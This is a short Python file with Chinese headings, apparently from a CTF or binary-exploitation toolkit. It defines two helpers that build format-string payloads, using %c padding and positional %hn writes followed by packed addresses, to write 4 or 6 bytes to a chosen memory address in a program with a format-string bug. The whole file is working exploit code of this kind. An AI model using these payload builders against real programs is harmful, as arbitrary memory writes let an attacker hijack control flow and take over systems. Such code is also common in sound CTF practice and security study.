往栈上某个地址一次写入6个字节
#target是目标地址,n0是想要写入的东西,k为ljust之后p64(target)为格式化字符串的第几个参数
def write_target(target, n0, k):
    """Build the format-string payload that places the low 48 bits of n0 at target.

    n0 is split into three 16-bit halves, each delivered by one ``%hn``
    conversion. The halves are emitted in ascending order of value so that
    every intermediate width is non-negative; each half keeps the positional
    argument index of its original slot (low half -> k, middle -> k+1,
    high -> k+2), and ``target``, ``target+2``, ``target+4`` are appended in
    that fixed order after the 40-byte padded format string.

    Returns None when any two halves are equal: the original six strict
    orderings cover only pairwise-distinct halves, and that gap is kept here.
    """
    halves = [n0 & 0xffff, (n0 >> 16) & 0xffff, (n0 >> 32) & 0xffff]
    # A tie makes every strict-ordering case false, so no payload is produced.
    if len(set(halves)) != 3:
        return None
    pieces = []
    emitted = 0
    # Walk the halves from smallest to largest; the width of each step is the
    # difference to the previous half, the argument index follows the slot.
    for slot, value in sorted(enumerate(halves), key=lambda item: item[1]):
        pieces.append(f'%{value - emitted}c%{k + slot}$hn')
        emitted = value
    fmt = ''.join(pieces).ljust(40, 'a').encode()
    return fmt + p64(target) + p64(target + 2) + p64(target + 4)
写入4个字节
def write1(target, n0, k=12):
    """Build the format-string payload that places the low 32 bits of n0 at target.

    n0 is split into two 16-bit halves delivered by ``%hn`` conversions. The
    smaller half is written first through positional argument k+1 and the
    larger one second through argument k; the two 8-byte addresses appended
    after the 0x30-byte padded format string are ordered so that argument k
    points at the larger half's location and k+1 at the smaller half's.
    When both halves are equal the low half is treated as the smaller one.
    """
    low = n0 & 0xffff
    high = (n0 >> 16) & 0xffff
    if low > high:
        first, second = high, low
        addrs = p64(target) + p64(target + 2)
    else:
        first, second = low, high
        addrs = p64(target + 2) + p64(target)
    fmt = f'%{first}c%{k+1}$hn%{second - first}c%{k}$hn'
    return fmt.ljust(0x30, 'a').encode() + addrs